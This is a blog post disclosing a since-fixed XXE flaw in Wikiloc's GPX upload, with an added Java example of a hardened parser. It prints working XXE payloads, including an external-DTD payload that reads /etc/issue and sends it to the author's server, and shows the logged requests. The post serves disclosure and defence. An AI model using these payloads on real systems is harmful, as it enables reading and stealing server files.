For those who still don’t know Wikiloc:
Wikiloc is a place to discover and share the best outdoor trails for hiking, cycling and many other activities.
We are 1,725,606 members exploring and sharing 3,936,841 outdoor trails and 6,503,289 photos.
I was searching for a cool track to ride my bike [yes I love #cycling] and I created an account on Wikiloc.
I already knew the site but had never registered. Such a cool site, in my opinion.
As a security researcher I always take a look at web applications' requests and transactions, and after uploading an XML file I remembered to test Wikiloc for an XXE (XML External Entity) vulnerability. This is a very dangerous type of vulnerability and could be used by malicious users to compromise the server.
So let me explain what I did:
First I downloaded a .gpx file from Wikiloc to see the structure of the XML.
I injected the following line on top of the file:
```xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.davidsopas.com/XXE" > ]>
```
And called the entity on the track name:
```xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.davidsopas.com/XXE" > ]>
<gpx
version="1.0"
creator="GPSBabel - http://www.gpsbabel.org"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.topografix.com/GPX/1/0"
xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd">
<time>2015-10-29T12:53:09Z</time>
<bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/>
<trk>
<name>&xxe;</name>
<trkseg>
<trkpt lat="40.737758000" lon="-8.093361000">
<ele>178.000000</ele>
<time>2009-01-10T14:18:10Z</time>
(…)
```
I uploaded the .gpx file and voilà! I got a request from the Wikiloc server to my own:
GET 144.76.194.66 /XXE/ 10/29/15 1:02 PM Java/1.7.0_51
To make sure that was their server I resolved the IP, which was master.wikiloc.com. I also now knew what version of Java they were using: 1.7.0_51.
But to show how dangerous it can be I wanted to test for an external DTD and request a file hosted on the Wikiloc server, /etc/issue [which will return the operating system used].
So I modified another .gpx file with the following code:
```xml
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % dtd SYSTEM "http://www.davidsopas.com/poc/xxe.dtd">
%dtd;]>
<gpx
version="1.0"
creator="GPSBabel - http://www.gpsbabel.org"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.topografix.com/GPX/1/0"
xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd">
<time>2015-10-29T12:53:09Z</time>
<bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/>
<trk>
<name>&send;</name>
(…)
```
xxe.dtd has the following XML code:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://www.davidsopas.com/XXE?%file;'>">
%all;
```
I uploaded the new .gpx file and got the following GET request on my server:
144.76.194.66 GET /XXE/?Debian 10/29/15 1:12 PM Java/1.7.0_51
With XXE you can do a variety of things. A malicious user could upload files, check source code, launch DDoS attacks, you name it.
This issue is already fixed by Wikiloc. They were very fast and concerned about this. It shows that they care about security.
They also provided me with a token of appreciation (they know exactly how to please a cyclist 🙂) and put my name on their contributors list.
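The post does not say how Wikiloc fixed their parser. As an added example (my code, not Wikiloc's), this is how a Java service built on the JDK's own DocumentBuilderFactory would have rejected both payloads above: a GPX file never needs a DOCTYPE, so the parser is told to refuse one outright, and the remaining features make sure nothing external is fetched even if that first switch were unavailable. The class name, the two sample GPX strings and the host attacker.example are constructed for the demo; the feature URIs are the standard Xerces/SAX ones that the JDK 7 parser already supported.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;

/** Hardened GPX reader (added example, not Wikiloc's code). */
public class SafeGpxReader {

    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Primary defence: any <!DOCTYPE ...> makes parse() throw a SAXParseException.
        // That stops both the inline-entity payload and the external-DTD payload,
        // because each of them needs a DOCTYPE to declare its entities.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth: if a parser ignores the feature above, still never
        // resolve general or parameter entities or load an external DTD.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        f.setNamespaceAware(true);
        return f;
    }

    /** Parses an uploaded GPX document and returns the first track name, or null. */
    static String firstTrackName(byte[] upload)
            throws ParserConfigurationException, IOException, SAXException {
        DocumentBuilder builder = hardenedFactory().newDocumentBuilder();
        Document doc = builder.parse(new ByteArrayInputStream(upload));
        NodeList names = doc.getElementsByTagNameNS("http://www.topografix.com/GPX/1/0", "name");
        return names.getLength() == 0 ? null : names.item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples: same shape as the post's first payload, with a placeholder host.
        String hostile = "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://attacker.example/XXE\">]>\n"
                + "<gpx version=\"1.0\" xmlns=\"http://www.topografix.com/GPX/1/0\">"
                + "<trk><name>&xxe;</name></trk></gpx>";
        String benign = "<gpx version=\"1.0\" xmlns=\"http://www.topografix.com/GPX/1/0\">"
                + "<trk><name>Sample ride</name></trk></gpx>";

        System.out.println("benign  -> " + firstTrackName(benign.getBytes(StandardCharsets.UTF_8)));
        try {
            firstTrackName(hostile.getBytes(StandardCharsets.UTF_8));
            System.out.println("hostile -> parsed: parser is NOT hardened");
        } catch (SAXException e) {
            // Expected path: the upload is refused before any entity is resolved,
            // so no outbound request and no file read ever happens.
            System.out.println("hostile -> rejected: " + e.getMessage());
        }
    }
}
```

The rejection happens at parse time, before the application sees any track data, which is also the right place to log the event: an upload carrying a DOCTYPE is a strong signal of someone probing for exactly this bug, and the log line should record the upload's origin rather than echo the hostile content back.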
Keep up the good work Wikiloc!